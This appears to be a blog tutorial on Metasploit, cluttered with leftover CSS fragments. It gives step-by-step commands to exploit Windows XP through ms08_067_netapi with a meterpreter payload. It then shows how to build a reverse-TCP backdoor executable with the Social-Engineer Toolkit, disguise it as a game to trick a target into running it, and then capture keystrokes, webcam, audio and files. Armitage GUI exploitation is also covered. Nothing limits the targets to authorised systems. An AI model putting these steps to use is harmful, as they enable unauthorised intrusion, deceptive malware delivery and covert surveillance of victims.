MetaspoiltUbuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”> can run on Linux, Mac OS X and on Windows. It is both a command line interface and a graphical user interface (GUI). The Metasploit Framework can be extended to use external add-ons in multiple languages making it a very powerful tool. Metasploit can be used to test the vulnerability of target systems either to protect them or to break into them. so for this reason be it legitimate or unauthorized activities, it clearly identifies the importance of security.

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>To exploit a system using the Metasploit Framework you carry out 5 steps:
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>1. Choose then configuring a pre loaded exploit in the database.
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>2. Check to see if the target system is susceptible to the exploit.
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>3. Configuring a payload
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>4. Encode the payload in order to hide it from an intrusion-prevention system (IPS)
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>5. Execute the exploit.

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>In order for you to choose an exploit and a payload, information about the target is required. There are many ways to gain this information from port scanning and OS fingerprinting tools such as Nmap or vulnerability scanners such as Nessus. I’ll leave your method of information gathering up to you.

Installation


Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Installation of the Metasploit framework is dependant on your Operating System and hardware therefore rather than list the ways to install to save covering all eventualities I have provided a link to both windows and Linux installations:

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>WindowsLINK…
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>LinuxLINK…

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>I would however highly recommend that you download KaliLinux which comes with Metasploit Pro already installed.

Usage


Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Metasploit is a great tool and a must have for all secutiry/penetration testers. I will show you a few ways in which metasploit can be used to exploit a target machine. (All my examples are done using Metasploit on KaliLinux exploiting a Windows XP SP3 OS)

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:1.2em !important;line-height:1.2em;margin:0;outline:0;padding:0 0 4px;text-align:justify;vertical-align:baseline;”>Exploit ms08_067_netapi.


Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>How to connect and exploit a target machine using Metasploit Exploit ms08_067_netapi. So first of lets boot up a version of Metasploit, with the cmd msfconsole:

metasploit start
metasploit start


Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Now we need to setup our windows exploit with the following commands:
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>1. use exploit/windows/smb/ms08_067_netapi
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>2. set payload windows/meterpreter/bind_tcp
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>3. set RHOST 192.168.0.10 (This IP Address will be your targets IP gained from a scan)
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>4. exploit (This command carries out the exploit as seen below)

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_f3b11d2adba5aacddbff8d6d351dc579.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>All being well you should have connected to the target and carry out a number of commands. Below is the screenshot command.

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_42b5e9e1dd305310dd3e381268aee366.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>And thats it easy!!

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>There are loads of commands to run under this exploit, just type help and a list will be displayed.
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Examples are: Recording audio from microphones, screenshots from their webcam, gathering keystrokes and downloading files.

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:1.2em !important;line-height:1.2em;margin:0;outline:0;padding:0 0 4px;text-align:justify;vertical-align:baseline;”>Social engineering example


Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Next lets see how to gain access to a targets machine using their interaction. Why? I hear you ask, well sometimes its not possible to connect directly for whatever reason lets say “security settings”. The following exploit uses the targets interaction to help us gain access.

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>So first things first bring up a terminal window and type the command: se-toolkit

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Then enter option 1 for social engineering attacks

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_dcceac0fd07e2de79d9550df12d9eca3.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Now option 4 to create a payload and listener and enter your IP Address.

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_6de4e27eaf992e55b23837f5b42ff4b5.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Now you need to pick the type of payload, we will go with option 2 – Windows Reverse TCP Meterpreter.

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_b1a7c925ec2e8c73e5ac7b4defb82b49.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Choose option 16 – Backdoor Executable
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Leave the port set to 443
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>(This port is used for secure web browser communication. Data transferred across such connections are highly resistant to eavesdropping and interception which is iroic concidering what we are using it for lol)
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>And finally start the listener.

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_85e8ddb7059aded3e547ecbad62944e6.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Ok so lets recap, we have just created an executable file with a payload hidden within. The next part is a little tricky you need to send the file to the target computer and get them to execute it. For example call it games and give it a nice icon lol.

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Before you send the file navigate to were it was created and right click and properties.

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_c2d9ac296708f9c5a8aaa41bc11ea8b0.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Tick the box to allow the file to be executed as a program

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_23ac654a9aa41b13c3c7c8db56aa8f42.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>So now we wait….. once the target executes the program you will get the following:

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_f47fdf41cca0ef93ed9b86a9796ccfd3.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>From here on in its the usual Meterpreter > prompt
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>As before you can now run commands like screenshot or shell.
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>The target is yours!

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_2a55103dcdec4ac7bd7f2e06c833be6b.jpg

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:1.2em !important;line-height:1.2em;margin:0;outline:0;padding:0 0 4px;text-align:justify;vertical-align:baseline;”>Armitage


Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>We’ve seen how to use Metasploit via the command line now lets see how to use a graphical version Armitage that lets us achieve the same goal.

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Armitage is a GUI way of using metasploit/meterpreter rather than cmd line so lets get started.

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>First navigate to Applications > Kali Linux > System Services > Metasploit > community / pro start …… this will start the server/database

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_09e7239f76a35fd1aebe692d2ab9c933.jpg

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Then type armitage in the terminal window and accept the default values:

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_133b44eb36389ea3e833e65b761ca2ec.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>You will probably get a popup asking to start metasploit, click yes
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>you should now see the following:

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_70a7f1bb1540dc6ad71fc692892641d5.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Dont worry about the connection refused it just takes a while to load.
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Now armitage will boot up if it asks you for the attack computer IP enter your IP Address.
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Navigate to the Hosts tab > Nmap Scan > Quick Scan (OS Detect)

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_f41941e5c6945f47d4dd3a8e43b3bc29.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>From here armitage will scan a range or a sigle IP Address of your choice then present it in the black window. Right click the target and click Scan

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_104aa55005305cce0cc7691b8dd0e27a.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>When the scan is complete expand the exploit > windows > smb and double click the ms08_67_netapi

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_c415bc13c15126d5b78705de4113bad0.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>This will bring up an attack confirmation window check the details and click launch

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_df156ff747901c8144cf5d1062749aed.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Confirmation of a successful exploit will look like this:

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_af26450c85394599f339d4db79b7b139.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>You can now right click the target and perform multiple commands

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_b4440e30bf4172341ab9ea9c7edb975d.jpg
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>here is an example of the Interact “remote command shell”

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_ad688c74a66aca371d72ce65f8fccb9e.jpg

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:1.2em !important;line-height:1.2em;margin:0;outline:0;padding:0 0 4px;text-align:justify;vertical-align:baseline;”>Websploit


Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>As an added extra WebsploitUbuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”> (below) uses exploits from Metasploit and has its own features as well which is used to scan and analysis remote systems in order to find vulnerabilites. If you enjoyed this article please comment and i will do one for Websploit. Thank you.

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
up_1b990ed5407226003a4ae441d9bebf2b.jpg

Summary


Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />
Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;”>Metasploit is a must have for anyone interested in the world of secutiry, you have just seen a few ways in which it can be used however keep in mind that this has only scratched the surface of the potential of this tool. To find out more please follow the links below.

Ubuntu, ‘Helvetica Neue’, Arial, Helvetica, Verdana, sans-serif;font-size:12px;line-height:16.1875px;text-align:justify;” />

What Do You Think on This ? Say Here